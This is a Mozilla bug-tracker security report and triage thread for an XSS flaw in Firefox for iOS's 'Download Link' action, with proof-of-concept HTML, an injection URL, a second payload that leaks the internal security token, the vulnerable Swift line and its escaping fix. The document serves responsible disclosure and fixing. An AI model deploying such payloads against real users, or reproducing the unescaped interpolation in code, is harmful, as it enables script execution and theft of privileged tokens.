XSS from booby-trapped link on Firefox iOS Download Link Action
Categories
(Firefox for iOS :: General, defect, P1)
Tracking
()
| Tracking | Status | |
|---|---|---|
| fxios | 26 | --- |
People
(Reporter: vinothsparrow, Assigned: garvan)
Details
(Keywords: csectype-sop, reporter-external, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high])
Attachments
(2 files)
Firefox Version: v24.1
OS: iOS 13.3.1
Issue: Universal XSS on Firefox iOS Download link Action
Description:
Firefox iOS user clicks download link in hyperlink option and XSS is triggered on current url, When the hyperlink is in format https://anydomain/','123');alert(document.domain);//
Sample attack scenerio
- Attacker links https://attacker.com/','123');alert( in google.com index
- Victim click's download link on firefox iOS
- XSS is executed on victim's google.com domain
Steps to reproduce:
- Open https://vinothkumar.tech/firefox-ios your iOS firefox browser.
- Hold the link until preview popup appears.
- Click Download Link
- XSS is triggered
Unescaped url link is being appeneded to the javascript when download action clicked
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(url.absoluteString)', '\(UserScriptManager.securityToken)')")
Fix:
let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(safeUrl)', '\(UserScriptManager.securityToken)')")
Youtube Unlisted Video: https://youtu.be/zkVVolyCrt0
POC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Firefox Universal Download Link XSS POC</title>
</head>
<body>
<a href="http://vinothsparrow.herokuapp.com/','123');alert(document.domain);//">Download Link in Firefox</a><br><br>
</body>
</html>
|
||
Comment 1•5 years ago
|
||
Garvan, can you help prioritize this? I don't have an iOS device but the write-up in comment #0 looks pretty serious.
|
Reporter | |
Comment 2•5 years ago
|
||
Also with this issue attacker can get security token value in the XSS. Using security token attacker can trigger webkit.messageHandlers events(loginsManagerMessageHandler, printHandler, sessionRestoreHelper, .. etc)
Payload to get security token:
<a href="https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1">XSS</a>
The above payload will alert the security token.
landed for v25 of Firefox iOS, the next release
|
||
Updated•5 years ago
|
|
|
||
Comment 5•5 years ago
|
||
It's not exactly a "Universal" XSS -- the attacker can't pick any arbitrary victim site. The target site has to be one where users can add links (which is still a large number of popular sites, especial social ones) and a context where the victim will want to download the link rather than click on it to open.
|
|
||
Updated•5 years ago
|
CVE for v25 was missed for this bug, assigning it to v26 in order to get picked up by the release notes process.
The bug https://bugzilla.mozilla.org/show_bug.cgi?id=1632387 is the same type of attack, leaking the token, and did have a sec advisory for v25.
Can you add a CVE to this bug? Thanks
$ ./ios_advisories.py 26
Generating advisories for Firefox for iOS Version 26
1631739 is missing a CVE identified....
|
|
||
Comment 9•5 years ago
|
||
Use CVE-2020-12404 for this one.
|
||
Updated•5 years ago
|
|
|
||
Updated•4 years ago
|
|
||
Updated•9 months ago
|
Description
•